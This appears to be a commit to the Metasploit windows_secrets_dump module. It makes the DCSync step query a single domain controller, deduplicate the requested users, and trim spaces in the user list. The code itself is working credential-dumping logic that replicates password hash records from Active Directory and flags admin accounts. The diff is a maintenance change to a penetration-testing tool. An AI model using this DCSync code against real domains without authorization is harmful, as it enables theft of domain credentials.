Fix bug: DCSync only once, rather than once per DC that exists in the domain

smashery · smashery · commit 67c33fa95fe7 · 2024-11-14T15:13:59.000+11:00
- Also only DCSync each user once (if they're specified multiple times in KRB_USERS)
- Also be resilient to spaces in the comma-sepration
diff --git a/modules/auxiliary/gather/windows_secrets_dump.rb b/modules/auxiliary/gather/windows_secrets_dump.rb
@@ -891,7 +891,7 @@ def dump_ntds_hashes
       )
       return
     end
-    specific_users = datastore['KRB_USERS'].strip.split(',')
+    specific_users = datastore['KRB_USERS'].strip.split(',').map { |s| s.strip }
 
     if specific_users.empty?
       users = get_domain_users
@@ -903,6 +903,8 @@ def dump_ntds_hashes
       users = get_domain_users_by_name(specific_users)
     end
 
+    sids = Set.new(users.map {|sid_and_user| sid_and_user[0]})
+
     dcerpc_client = connect_drs
     unless dcerpc_client
       print_error(
@@ -914,29 +916,27 @@ def dump_ntds_hashes
     ph_drs = dcerpc_client.drs_bind
     dc_infos = dcerpc_client.drs_domain_controller_info(ph_drs, domain_name)
     user_info = {}
-    dc_infos.each do |dc_info|
-      users.each do |user|
-        sid = user[0]
-        crack_names = dcerpc_client.drs_crack_names(ph_drs, rp_names: [sid])
-        crack_names.each do |crack_name|
-          user_record = dcerpc_client.drs_get_nc_changes(
-            ph_drs,
-            nc_guid: crack_name.p_name.to_s.encode('utf-8'),
-            dsa_object_guid: dc_info.ntds_dsa_object_guid
-          )
-          user_info[sid] = parse_user_record(dcerpc_client, user_record)
-        end
+    dc_info = dc_infos[0]
+    sids.each do |sid|
+      crack_names = dcerpc_client.drs_crack_names(ph_drs, rp_names: [sid])
+      crack_names.each do |crack_name|
+        user_record = dcerpc_client.drs_get_nc_changes(
+          ph_drs,
+          nc_guid: crack_name.p_name.to_s.encode('utf-8'),
+          dsa_object_guid: dc_info.ntds_dsa_object_guid
+        )
+        user_info[sid] = parse_user_record(dcerpc_client, user_record)
+      end
 
-        groups = get_user_groups(sid)
-        groups.each do |group|
-          case group.name
-          when 'BUILTIN\\Administrators'
-            user_info[sid][:admin] = true
-          when '(domain)\\Domain Admins'
-            user_info[sid][:domain_admin] = true
-          when '(domain)\\Enterprise Admins'
-            user_info[sid][:enterprise_admin] = true
-          end
+      groups = get_user_groups(sid)
+      groups.each do |group|
+        case group.name
+        when 'BUILTIN\\Administrators'
+          user_info[sid][:admin] = true
+        when '(domain)\\Domain Admins'
+          user_info[sid][:domain_admin] = true
+        when '(domain)\\Enterprise Admins'
+          user_info[sid][:enterprise_admin] = true
         end
       end
     end
